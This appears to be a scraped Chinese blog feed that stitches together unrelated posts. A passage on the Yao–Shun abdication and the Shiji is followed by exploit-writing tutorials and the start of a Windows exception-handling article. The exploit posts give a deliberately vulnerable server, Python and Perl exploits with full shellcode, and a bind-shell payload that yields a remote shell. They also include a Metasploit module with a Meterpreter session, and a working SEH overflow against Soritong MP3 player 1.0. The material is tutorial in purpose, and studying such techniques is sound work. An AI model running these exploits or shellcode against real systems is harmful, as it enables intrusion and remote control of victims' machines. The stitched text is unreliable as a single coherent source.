<p>放勋:帝尧,他哥挚当皇帝不行,他就上了。</p>
<p>重华:帝舜,帝尧到帝舜这都隔了多少代了,神话还是神话啊。</p>
<p>尧舜禅让历来为人们所乐道,部落联盟推举制度也是自古就有的。尧舜禅让与部落联盟推举天子的制度至少有三方面的不同。</p>
<p>生让:其他部落联盟推举天子都是前一任的天子死掉,大家再决定下一任的继承者,尧舜都是活着就在找人了;</p>
<p>侧陋:是说尧找继承人的时候不是说一定要身边的贵族,即使是民间隐匿者也可以是,只要你有能力;</p>
<p>试可:这是最重要的,因为是生让,所以才可以试可,在活着的时候就要多方考验这个人,看这个人足不足以担当大任。</p>
<p>这是三个最重要的不同,也是中国文化的精神。这种精神是说天下乃是重器,不可轻易授之于人。所谓“夫天下至重也”。因为至重,交给一个人的时候一定要格外小心,不能够有自己的私心,也要多方考验,这个人是否足以承担大任。这就是中国人禅让真正的思想。</p>
<p>五帝本纪上说:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>自黄帝至舜、禹,皆同姓而异其国号,以章明德。故黄帝为有熊,帝颛顼为高阳,帝喾为高辛,帝尧为陶唐,帝舜为有虞。帝禹为夏后而别氏,姓姒氏。契为商,姓子氏。弃为周,姓姬氏。
</code></pre></div></div>
<p>这段话是说夏商周三代以前的历代帝王全都是黄帝的子孙。司马迁以此找出一个天下一家的来源,相信所有的人都有共同的来源,太史公所以以黄帝为中华民族的始祖,就是这个原因。</p>
<p>自古三皇五帝就有很多传说,《尚书》记载的是尧以来的事,百家言黄帝各有各的说法,那个时候各种传说流传,缙绅也不知道怎么评价黄帝。作为历史学家的司马迁怎么办呢?</p>
<p>“余尝西至空桐,北过涿鹿,东渐於海,南浮江淮矣,至长老皆各往往称黄帝、尧、舜之处,风教固殊焉,总之不离古文者近是。”</p>
<p>司马迁于是走访各处,访问当地的人民,查阅古籍,得出了“不离古文者近是”的结论。司马迁写下一句意味深长的话:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>非好学深思,心知其意,固难为浅见寡闻道也。
</code></pre></div></div>
<p>太史公为了后来读《史记》的人确立一个阅读的基本原则:要读懂我这本书,一定要是好学深思,心知其意的人。</p>
<p>读完《五帝本纪》需要注意一个现象,整篇文章只言治不言乱,并不是因为太史公捏造事实,而是太史公觉得这是中国最好的政治理想,而且他相信这个理想曾经是存在过的。</p>
exploit编写笔记3——编写Metasploit exploit2014-04-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/08/metasploit
<p>这是exploit编写笔记第三篇,编写metasploit exploit。
首先,编写一个带有缓冲区溢出漏洞的服务器端程序。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// server.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <iostream.h>
#include <winsock.h>
#include <windows.h>
//load windows socket
#pragma comment(lib, "wsock32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion;
WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
u_short LocalPort;
LocalPort = 200;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
}
</code></pre></div></div>
<p>向该服务程序发送超过500字节的数据时,会造成其崩溃。下面的python脚本会触发崩溃:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
data = 'A' * 1000
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()
</code></pre></div></div>
<p><img src="/assets/img/metasploit/1.png" alt="" /></p>
<p>使用mona pattern确定其eip偏移在504。</p>
<p><img src="/assets/img/metasploit/2.png" alt="" /></p>
<p><img src="/assets/img/metasploit/3.png" alt="" /></p>
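<p>mona/metasploit所用的循环pattern定位偏移的原理很简单:生成一个任意4字节子串都唯一的序列,崩溃后拿eip中的4个字符回来查找位置。下面是一段Python示意实现(非mona本身):</p>

```python
import string

def pattern_create(length):
    # 与 metasploit 相同的 Aa0Aa1Aa2... 三重循环模式
    out = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return ''.join(out)[:length]
    return ''.join(out)[:length]

def pattern_offset(value, length=2000):
    # value 是崩溃时 eip 中的4个字符(注意从寄存器读出时要考虑小端序)
    return pattern_create(length).find(value)

pat = pattern_create(1000)
print(pattern_offset(pat[504:508]))   # 504
```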
<p>查找一个push esp ;ret 序列,我们找的是71a22b53,用这个值覆盖eip。shellcode我们随便使用一个Messagebox。</p>
<p>得到一个如下的python脚本:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
data = "A" * 504
#71a22b53
data += "\x53\x2b\xa2\x71"
shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0")
data+=shellcode
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()
</code></pre></div></div>
<p>运行成功:</p>
<p><img src="/assets/img/metasploit/4.png" alt="" /></p>
<p>我们再使用一个绑定端口的的payload,下面的payload将shell绑定到tcp 5555端口:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#
print " --------------------------------------\n";
print " Writing Buffer Overflows\n";
print " Peter Van Eeckhoutte\n";
print " http://www.corelan.be:8800\n";
print " --------------------------------------\n";
print " Exploit for vulnserver.c\n";
print " --------------------------------------\n";
use strict;
use Socket;
my $junk = "\x90" x 504;
#jmp esp (from ws2_32.dll)
my $eipoverwrite = pack('V',0x71a22b53);
#add some NOP's
my $shellcode="\x90" x 50;
# windows/shell_bind_tcp - 702 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=5555, RHOST=
$shellcode=$shellcode."\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a" .
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f" .
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35" .
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f" .
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31" .
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e" .
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54" .
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b" .
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45" .
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b" .
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b" .
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c" .
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e" .
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36" .
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47" .
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48" .
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56" .
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58" .
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38" .
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56" .
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53" .
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35" .
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58" .
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36" .
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38" .
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46" .
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59" .
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54" .
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57" .
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35" .
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38" .
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59" .
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49" .
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32" .
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a" .
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e" .
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56" .
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a" .
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30" .
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f" .
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30" .
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f" .
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a" .
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50" .
"\x41\x41";
# initialize host and port
my $host = shift || '192.168.10.130';
my $port = shift || 200;
my $proto = getprotobyname('tcp');
# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk.$eipoverwrite.$shellcode."\n";
print "[+] Payload sent\n";
print "[+] Attempting to telnet to $host on port 5555...\n";
system("telnet $host 5555");
close SOCKET or die "close: $!";
</code></pre></div></div>
<p>下面是输出:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~# perl sploit.pl 192.168.10.130 200
--------------------------------------
Writing Buffer Overflows
Peter Van Eeckhoutte
http://www.corelan.be:8800
--------------------------------------
Exploit for vulnserver.c
--------------------------------------
[+] Setting up socket
[+] Connecting to 192.168.10.130 on port 200
[+] Sending payload
[+] Payload sent
[+] Attempting to telnet to 192.168.10.130 on port 5555...
Trying 192.168.10.130...
Connected to 192.168.10.130.
Escape character is '^]'.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug>dir
dir
驱动器 D 中的卷没有标签。
卷的序列号是 0EAA-0461
D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug 的目录
2014-04-07 17:22 <DIR> .
2014-04-07 17:22 <DIR> ..
2014-04-07 16:56 172,124 server.exe
2014-04-07 16:56 185,136 server.ilk
2014-04-07 16:56 25,594 server.obj
2014-04-07 17:22 43,520 server.opt
2014-04-07 16:56 203,728 server.pch
2014-04-07 16:56 353,280 server.pdb
2014-04-07 16:56 2,203 StdAfx.obj
2014-04-07 17:23 91,136 vc60.idb
2014-04-07 16:56 135,168 vc60.pdb
9 个文件 1,211,889 字节
2 个目录 16,896,925,696 可用字节
</code></pre></div></div>
<p>成功得到了存在漏洞服务器的shell。</p>
<p>将exploit转换成metasploit,现在先贴代码,以后有时间仔细研究这个的写法。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Terenceli ' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 CHS',
{ 'Ret' => 0x71a22b53, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,
'Privileged' => false
))
register_options(
[
Opt::RPORT(200)
], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
</code></pre></div></div>
<p>在xpsp3上的测试:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(server) > set RHOST 192.168.10.130
RHOST => 192.168.10.130
msf exploit(server) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(server) > exploit
[*] Started bind handler
[*] Sending stage (769024 bytes) to 192.168.10.130
[*] Meterpreter session 2 opened (192.168.10.129:50459 -> 192.168.10.130:4444) at 2014-04-07 20:46:05 +0800
meterpreter > sysinfo
Computer : CHINA-CE09C2DA6
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
</code></pre></div></div>
exploit编写笔记2——基于SEH的exploit2014-04-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/07/seh-exploit
<p>这是exploit编写的第二篇笔记,基于SEH的exploit。SEH的原理在之前的文章中已经做了详细说明,这里不再赘述。这次的例子是Soritong MP3 player 1.0上的漏洞,程序下载:<a href="/assets/file/seh-exploit/soritong10.exe">soritong10.exe</a>。</p>
<p>这个漏洞指出一个畸形皮肤文件将导致溢出,我们用python创建一个ui.txt文件并放到skin\default文件夹下面:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file = "ui.txt"
junk = "A" * 5000
f = open(file,'w')
f.write(junk)
f.close()
</code></pre></div></div>
<p>打开soritong mp3,可以看到程序悄无声息地崩溃掉。使用windbg查看,SEH链的prev和handler都被我们的’A’覆盖了。</p>
<p><img src="/assets/img/sehexploit/1.png" alt="" /></p>
<p>当异常发生时,程序会跳转到SEH handler去执行,通过将这个handler的值设置为程序自带模块的一个pop/pop/ret地址,能够实现程序跳转到next seh pointer去,在next seh中需要做的就是跳转到shellcode执行。corelan的教程说的是造成一个二次异常,我觉得不是,就是简单的ret将next seh的值弹到了eip而已。shellcode的布局大致如下:</p>
<p>[junk][next seh][seh][shellcode]</p>
<p>next seh是一个跳转到shellcode的指令,seh是一个程序自带模块的p/p/r地址。</p>
<p>通过mona的pattern可以找到se handler需要覆盖的偏移为588。short jmp指令的机器码是eb,后面跟上跳转距离;向前跳过6个字节的short jmp机器码为eb 06。所以使用0xeb,0x06,0x90,0x90覆盖 next seh。</p>
<p>查找pop pop ret指令</p>
<p><img src="/assets/img/sehexploit/2.png" alt="" /></p>
<p><img src="/assets/img/sehexploit/3.png" alt="" /></p>
<p>也就是说se handler在588个字节后被覆盖,next seh就在584个字节后被覆盖。</p>
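<p>这个布局可以用几行Python拼出来,并检查各字段落在预期的偏移上(示意代码,shellcode用NOP占位,p/p/r地址这里先用一个占位值,实际地址在后文查找):</p>

```python
import struct

offset_nseh = 584                  # next seh 字段的偏移
junk      = b"A" * offset_nseh
nseh      = b"\xeb\x06\x90\x90"    # short jmp +6,跳过 4 字节的 seh 字段
seh       = struct.pack("<I", 0x10012984)  # p/p/r 地址,按小端序打包(占位值)
shellcode = b"\x90" * 16           # 真正的 shellcode 用 NOP 占位

payload = junk + nseh + seh + shellcode
print(len(junk), payload[584:588], payload[588:592])
```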
<p>接着,我们找p/p/r地址</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000> lm
start end module name
00400000 004de000 SoriTong C (export symbols) C:\Program Files\SoriTong\SoriTong.exe
010d0000 0111f000 DRMClien (deferred)
10000000 10094000 Player (deferred)
42100000 42129000 wmaudsdk (deferred)
5adc0000 5adf7000 uxtheme (deferred)
5bd10000 5bd50000 strmdll (deferred)
5d170000 5d20a000 COMCTL32 (deferred)
62c20000 62c29000 LPK (deferred)
0:000> s 10000000 10094000 5f 5e c3
1000e0d2 5f 5e c3 8b 47 78 85 c0-75 05 33 c0 5f 5e c3 8b _^..Gx..u.3._^..
1000e0de 5f 5e c3 8b 07 8b cf ff-10 8b f0 85 f6 7c 07 8b _^...........|..
1000e0f6 5f 5e c3 cc cc cc cc cc-cc cc 53 56 57 8b f1 55 _^........SVW..U
100106fb 5f 5e c3 cc cc 8b 44 24-08 8b 54 24 04 50 8b 49 _^....D$..T$.P.I
10010cab 5f 5e c3 cc cc 41 e8 6a-fe ff ff a8 01 74 05 d1 _^...A.j.....t..
100116fd 5f 5e c3 56 8b f1 8d 89-1c 8a 04 00 e8 82 74 ff _^.V..........t.
1001263d 5f 5e c3 55 8b ec 57 56-8b 75 0c 8b 7d 08 8b 4d _^.U..WV.u..}..M
100127f8 5f 5e c3 cc cc cc cc cc-8b 44 24 04 56 57 8b d0 _^.......D$.VW..
1001281f 5f 5e c3 cc cc cc cc cc-cc cc cc cc cc cc cc cc _^..............
10012984 5f 5e c3 cc cc cc cc cc-cc cc cc cc 8b 44 24 04 _^...........D$.
...
</code></pre></div></div>
<p>我们随便选一个如10012984.</p>
<p>这里再解释一下pop pop ret指令的作用。当异常发生的时候,异常分发器会建立自己的栈帧,并将EH handler的参数压入新建的栈帧中。这些参数中有一个域是EstablisherFrame,这个域指向异常注册记录(next seh)的地址并被压入栈中;当handler函数被调用的时候,这个值正好位于ESP+8的地方。执行pop pop ret后,就会将next seh的地址放到EIP中,从而执行next seh处的指令。</p>
<p>最终的shellcode就是</p>
<p>junk:584字节 ‘A’</p>
<p>next seh:”\xeb\x06\x90\x90”</p>
<p>seh:”\x84\x29\x01\x10”</p>
<p>shellcode:完成功能的,随便找了一个弹计算器的</p>
<p>并且在最后加了一些垃圾数据</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name = "ui.txt"
data = "A" * 584
nextseh = "\xeb\x06\x90\x90"
seh = "\x84\x29\x01\x10"
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x46\x42\x50\x5a")
junk2="\x90" * 1000;
data = data + nextseh + seh + shellcode + junk2
f = open(name,'w')
f.write(data)
f.close()
</code></pre></div></div>
<p>将ui.txt文件放在skin/default里面,再点击原程序,发现弹出了计算器。</p>
Windows用户态异常处理2014-03-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/31/windows-user-exception
<ul>
<li><a href="#第一节">Windows异常的分发</a></li>
<li><a href="#第二节">OS提供的SEH机制</a></li>
<li><a href="#第三节">编译器层面的SEH</a></li>
<li><a href="#第四节">展开</a></li>
</ul>
<p>已经有太多的文章对Windows异常处理进行了讨论,我这里也是在前人的基础上总结一下,自己做个记录。为了便于理解,我准备从异常发生的那一刻到执行我们自己定义的异常处理函数进行一个梳理。</p>
<h3 id="第一节">一. Windows异常的分发</h3>
<p>在保护模式下,当有中断或异常发生时,CPU是通过IDT进入内核来寻找处理函数的,比如我们在执行一个除0操作,就会使得CPU的执行转到IDT第一项所注册的地址(nt!KiTrap00)。或者我们试图访问一个不存在的内存页会使流程转到nt!KiTrap0E。使用windbg查看idt,如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> !idt -a
Dumping IDT: 8003f400
9d120e4800000000: 804e0360 nt!KiTrap00
9d120e4800000001: 804e04db nt!KiTrap01
9d120e4800000002: Task Selector = 0x0058
9d120e4800000003: 804e08ad nt!KiTrap03
9d120e4800000004: 804e0a30 nt!KiTrap04
9d120e4800000005: 804e0b91 nt!KiTrap05
9d120e4800000006: 804e0d12 nt!KiTrap06
9d120e4800000007: 804e137a nt!KiTrap07
9d120e4800000008: Task Selector = 0x0050
9d120e4800000009: 804e179f nt!KiTrap09
9d120e480000000a: 804e18bc nt!KiTrap0A
9d120e480000000b: 804e19f9 nt!KiTrap0B
9d120e480000000c: 804e1c52 nt!KiTrap0C
9d120e480000000d: 804e1f48 nt!KiTrap0D
</code></pre></div></div>
<p>KiTrap00函数通常只是对异常作简单的表征和描述,为了支持调试和软件自己定义的异常处理函数,系统需要将异常分发给调试器或应用程序的处理函数。对于软件异常,Windows系统采用的策略是以和CPU异常统一的方式来分发和处理的,处理的关键函数是nt!KiDispatchException。</p>
<p><img src="/assets/img/exception/1.png" alt="" /></p>
<p>KiDispatchException原型如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VOID KiDispatchException(IN PEXCEPTION_RECORD ExceptionRecord,
IN PKEXCEPTION_FRAME ExceptionFrame,
IN PKTRAP_FRAME TrapFrame,
IN KPROCESSOR_MODE PreviousMode,
IN BOOLEAN FirstChance
)
</code></pre></div></div>
<p>ExceptionRecord用来描述异常,定义如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct _EXCEPTION_RECORD {
NTSTATUS ExceptionCode;
ULONG ExceptionFlags;
struct _EXCEPTION_RECORD *ExceptionRecord;
PVOID ExceptionAddress;
ULONG NumberParameters;
ULONG_PTR ExceptionInformatio[EXCEPTION_MAXIMUM_PARAMETERS];
} EXCEPTION_RECORD;
</code></pre></div></div>
<p>ExceptionFrame对于x86结构总是NULL,参数TrapFrame用来描述异常发生时的处理器状态,包括各种通用寄存器、调试寄存器、段寄存器等。定义如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct _KTRAP_FRAME {
ULONG DbgEbp;
ULONG DbgEip;
ULONG DbgArgMark;
ULONG DbgArgPointer;
ULONG TempSegCs;
ULONG TempEsp;
ULONG Dr0;
ULONG Dr1;
ULONG Dr2;
ULONG Dr3;
ULONG Dr6;
ULONG Dr7;
ULONG SegGs;
ULONG SegEs;
ULONG SegDs;
ULONG Edx;
ULONG Ecx;
ULONG Eax;
ULONG PreviousPreviousMode;
PEXCEPTION_REGISTRATION_RECORD ExceptionList;
ULONG SegFs;
ULONG Edi;
ULONG Esi;
ULONG Ebx;
ULONG Ebp;
ULONG ErrCode;
ULONG Eip;
ULONG SegCs;
ULONG EFlags;
ULONG HardwareEsp;
ULONG HardwareSegSs;
ULONG V86Es;
ULONG V86Ds;
ULONG V86Fs;
ULONG V86Gs;
} KTRAP_FRAME;
</code></pre></div></div>
